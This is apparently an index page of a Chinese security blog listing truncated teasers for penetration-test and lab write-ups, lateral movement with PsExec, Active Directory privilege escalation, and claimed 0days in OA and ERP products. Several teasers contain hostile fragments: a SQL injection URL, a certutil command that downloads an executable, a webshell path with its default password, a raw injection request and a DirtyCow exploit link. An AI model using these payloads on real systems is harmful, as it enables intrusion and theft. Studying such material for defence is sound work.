-
实战-一次迂回渗透测试
当着当着狗我又变成了RT-第一个站 锤了两天的站 只是为了证明我可以 三篇文章,三个站,此行心灵受到创伤的一次。 世上无难事 虽然最后都捶下来了,但还是败给了人情世故 最少的是锤了半天 最长是花费了两天捶下来的,写下来 分享给大家,扩展一下思路,另外希望大家可以不轻言放弃! 过程其实没法写的太真实,因为这个站我做了太多的尝试。 目标: xx.x.x.82 三个端口 443,81,22080 81端…- 424
- 0
-
优秀初级靶场WP分享(二)
初级靶场 书接上回(入门靶场) 192.168.77.33成为了入口 入口信息收集 由于之前获取了77.33的管理员权限,可以直接登录系统。 查看存在的网卡,发现除了入门靶场的77段网卡以外还有两块网卡 那不直接扫他 10段的有1台机器 192.168.99段有四台机器,看着web服务感觉192.168.99.5和10.1.1.133是同一台机器。 全端口扫描了一下99段,又扫出来一些东西 10段…- 451
- 0
-
优秀初级靶场WP分享
在入门级靶场上线77.33后发现该机器为双网卡机器。 在该服务器上对99段进行扫描发现以下资产。 192.168.99.3 在记忆中,这个网站是存在sql注入漏洞的,拿出payload打一下,果不其然,获取到了后台的账号密码。 http://192.168.99.3:8036/news\_search.asp?key=7%%27%20union%20select%200,username%2BCH…- 353
- 0
-
某达摄像头的漏洞挖掘经历
前言 在看了一位师傅的关于摄像头的文章之后,我也心血来潮找了一款摄像头(某达最新款CP7)固件去挖一下练练手。 串口获取shell 拿到摄像头拆下来之后尝试了一波串口获取shell。 image-20230103171820881但是连上之后发现这个摄像头貌似无法获得一个正常的shell,只能用来看回显信息。 image-20230103171820881分析 用IDA打开摄像头相关程序之后,可以…- 357
- 0
-
仿真实战靶场系列-初级靶场
靶场分为五大块,分别是入门、初级、中级、高级、红队, 都是平时在虎王中所遇到的,以实战为背景攒成的一套仿真实战靶场。 靶场大概的框架 IP预分布 初级靶场版块: 在初级靶场版块是一个针对新手进阶而建立的,共四台服务器。 入口是一个入门靶场的中间件服务器的双网卡。 一些Cms的漏洞和数据库的漏洞,当然这里开始涉及到初级的一个提权。 在此也感谢参与内测的好兄弟们和xdm输出的文章 在此: 如果反响好的…- 868
- 0
-
横向移动 – PsExec 的使用
PsExec PsExec 主要用于大批量 Windows 主机的维护,在域环境下效果尤其好。(因为 PsExec 是 Windows 提供的工具,所以杀毒软件将其列入白名单中) 因为使用 PsExec 通过命令行环境与目标机器建立连接,甚至控制目标机器,而不需要通过远程桌面(RDP)进行图形化的控制。 PsExec 包含在 PsTools 工具包中,下载地址:https://download.s…- 313
- 0
-
从外网 Weblogic 打进内网,再到约束委派接管域控
渗透攻击红队 一个专注于红队攻击的公众号大家好,这里是 渗透攻击红队 的第 78 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!对于本星球的域渗透系列文章目前已更新完结:(接下来会更新其他系列文章,敬请期待) 为了能让来星球学习的兄弟们有一个更好的学习环境,我搭建了一套域渗透靶场: 域控桌面下一个一个 …- 441
- 0
-
只需要一个域用户即可拿到 DC 权限(CVE-2021-42287 and CVE-2021-42278)
前言最近出了两个漏洞: CVE-2021-42278,机器账户的名字一般来说应该以$结尾,但AD没有对域内机器账户名做验证。 CVE-2021-42287,与上述漏洞配合使用,创建与DC机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self申请TGS Ticket,接着DC在TGS_REP阶段,这个账户不存在的时候,DC会使用自己的密钥加密TGS Tic…- 240
- 0
-
一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透
前言 首先是通过 CVE-2017-12149 拿到了一个口子: 但其实 Jboss 的这个路径可以查看到日志 http://redteam.red:9090/status 发现有日志,已经被上传了 webshell: 后来通过 Bypass 后使用 powershell 上线到 CobaltStrike: 利用 Metasploit 特权提权拿到 SYSTEM SHELL 上线之后通过信息搜集发…- 158
- 0
-
一次从外网 JoomlaCMS 渗透 Getshell,再到内网域渗透
红队攻防实验室 一个专注于红队攻防研究的公众号大家好,这里是 红队攻防实验室 的第 3 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关! 简介 靶机作者:licong 靶机描述:域控中存在一份重要文件(获取域控权限) 靶机主机有5台:ubantu、win2008、win7、win2012、centos …- 50
- 0
-
一文教你将个人微信化身ChatGPT机器人
测了两种,第一种不能在群内直接对话,第二种比较香~ 第一种: 使用的项目: https://github.com/wangrongding/wechat-bot 这里我使用的环境是: ubuntu 20 nodejs 18.9.0 下载项目 apt-get install git git clone https://github.com/wangrongding/wechat-bot 配置 执行下…- 224
- 0
-
信息收集之获取微信聊天记录
在内网渗透中 一般我的习惯是先打一台PC机,当通过某种手段拿下PC机后进行信息手机大概是可以用到,另一种是获取了登录账号密码,没有远程 也可以通过smb将文件传回本地进行信息收集。 下面就手把手教大伙如何获取目标的聊天记录~~ 目标上线后可以通过VNC、截图、tasklist等多种手段来确认微信是否开启 获取key 使用工具 获取微信key 获取key后通过脚本进行解密 python3 from …- 596
- 0
-
thinkphp最新rce(Thinkphp,v6.0.1~v6.0.13,v5.0.x,v5.1.x)
影响范围 Thinkphp,v6.0.1~v6.0.13,v5.0.x,v5.1.x fofa指纹 header="think_lang" 简单描述 如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。- 190
- 0
-
1024节日快乐-看大佬使用Msf与IE打穿内网
大致拓扑 第一台: 扫描了一下是有ms17-010的,但怼的时候没有成功。先用8075端口通达OA命令执行漏洞进去看看: 后来ms17-010能怼了,正式开启msf之路。 原计划在meterpreter里面建立路由,横向渗透。但是涉及到端口转发,msf隧道就会断掉。 不过没有关系,在靶机里面装一个msf就行了。 Win7用户远程桌面保存了一个机器,但msf没有办法直接抓到远程桌面登录的密码。 第三…- 146
- 0
-
通过搭建内网web进行内网穿透
0x00.起因 在某次攻防过程中,在一顿搜集资产的过程中发现了一个使用tomcat中间件的网站。 随手试了个tomcat/123456没想到进去了,经过war包部署轻松拿下服务器权限。 现在的我还不知道事情的严重性,只是想到这么轻松的到达内网,这进去以后不得乱杀。 通过查看IP发现这个是192.168.70.1的一个内网网段。 扫描器安排上,办他。 经过一顿扫描绝望的发现,在本网段上好像只有自己一…- 255
- 0
-
Windows下载命令-certutil利用总结
场景一:下载文件 certutil -urlcache -split -f https://baidu.com/7.exe 场景二:mssql拿不下shell情况下,通过dir发现后缀为:docx、xlsx、exe等敏感文件时候使用该命令将- 408
- 0
-
-
脏牛Linux 本地提权
编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。 1.Linux Ubuntu 14.04 : 1)添…- 931
- 0
-
-
(最新)致远OA前台未授权任意文件上传getshell
《某OA前台未授权任意文件上传getshell》 冰蝎3 默认马pass:rebeyond Webshell地址:127.0.0.1/seeyon/SeeyonUpdate1.jspx 已验证poc真实有效 影响版本:致远OA V8.0致远OA V7.1、V7.1SP1致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3致远OA V6.0、V6.1SP1、V6.1SP2致远OA V5…- 2.9k
- 0
-
(CVE-2020-16898)Windows TCP/IP远程执行代码漏洞 exp复现
CVE-2020-16898 微软TCP/IP远程执行代码漏洞 影响版本: 下载Windows 10 镜像 1909 ed2k://|file|cn_windows_10_business_editions_version_1909_x64_dvd_0ca83907.iso|5275090944|9BCD5FA6C8009E4D0260E4B23008BD47|/ 测试版本: 安装scapy pi…- 2.3k
- 0
-
绿盟UTS综合威胁探针管理员任意登录(0day)
漏洞详情: 绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。 绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。 处置意见: 建…- 1.7k
- 0
-
用友GRP-u8 注入(0day)
`POST /Proxy HTTP/1.1 Accept: Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Content-Length: 357 Connection: Keep-Alive Cache-Cont…- 2.5k
- 0
幸运之星正在降临...
点击领取今天的签到奖励!
恭喜!您今天获得了{{mission.data.mission.credit}}积分
我的优惠劵
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×
没有优惠劵可用!